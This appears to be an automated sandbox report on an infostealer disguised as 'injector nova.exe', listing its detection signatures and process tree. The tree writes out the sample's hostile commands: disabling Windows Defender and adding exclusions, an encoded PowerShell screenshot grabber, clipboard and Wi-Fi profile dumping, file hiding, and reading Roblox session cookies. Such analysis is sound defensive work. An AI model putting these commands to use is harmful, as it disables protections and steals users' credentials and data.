Analysis

  • max time kernel
    33s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-01-2025 15:19

General

  • Target

    injector nova.exe

  • Size

    7.6MB

  • MD5

    cebf49e54d37132a17f613eee8b7a8fb

  • SHA1

    597eb7b2408b85182f2b40cdb83852605bd2e841

  • SHA256

    205c84f75b64218d83eda868f4118722c7f2b7f97dcbc9bf35bed2947cf9ba2b

  • SHA512

    8f0d12d8cdf4a977c5a3407aa3faa26c73a5bc9a42f4ff175e8808876eaf16a2b9fec89c6c9334fcb275203c90fc3b0e10a236c8b4a3e9729d64ae48a9614eb1

  • SSDEEP

    196608:Xu+YS6x0MOshoKMuIkhVastRL5Di3ue1D730I:VYSU0MOshouIkPftRL54fREI

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 48 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\injector nova.exe
    "C:\Users\Admin\AppData\Local\Temp\injector nova.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Users\Admin\AppData\Local\Temp\injector nova.exe
      "C:\Users\Admin\AppData\Local\Temp\injector nova.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3780
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\injector nova.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\injector nova.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3768
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3348
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3184
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2376
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4048
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2612
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          PID:1580
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3692
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2904
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:324
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2380
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:3664
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3124
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:2396
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:796
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:1972
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:5092
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1924
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\injector nova.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:1916
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\injector nova.exe"
              4⤵
              • Views/modifies file attributes
              PID:1848
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌​ .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3532
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌​ .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:912
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4316
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:5060
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4564
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:3440
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
              PID:4328
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:4124
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:1068
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4816
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:1180
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:3672
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                  3⤵
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:3100
                  • C:\Windows\system32\netsh.exe
                    netsh wlan show profile
                    4⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:2584
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:3548
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3164
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:4504
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:1812
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:3980
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:5116
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:5040
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1776
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nvtjdywk\nvtjdywk.cmdline"
                                  5⤵
                                    PID:3952
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3E1.tmp" "c:\Users\Admin\AppData\Local\Temp\nvtjdywk\CSC27E8CFEC74F4CCE9E41D343263B2B80.TMP"
                                      6⤵
                                        PID:924
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:2984
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:1944
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:3748
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:1948
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:1156
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:4424
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                            3⤵
                                              PID:1028
                                              • C:\Windows\system32\attrib.exe
                                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                                4⤵
                                                • Drops file in Drivers directory
                                                • Views/modifies file attributes
                                                PID:4228
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              3⤵
                                                PID:904
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  4⤵
                                                  • Enumerates processes with tasklist
                                                  PID:5108
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:1916
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:388
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:3312
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:2492
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:3944
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:3476
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:3256
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2892
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:1768
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:4516
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                3⤵
                                                                  PID:2488
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    4⤵
                                                                      PID:5092
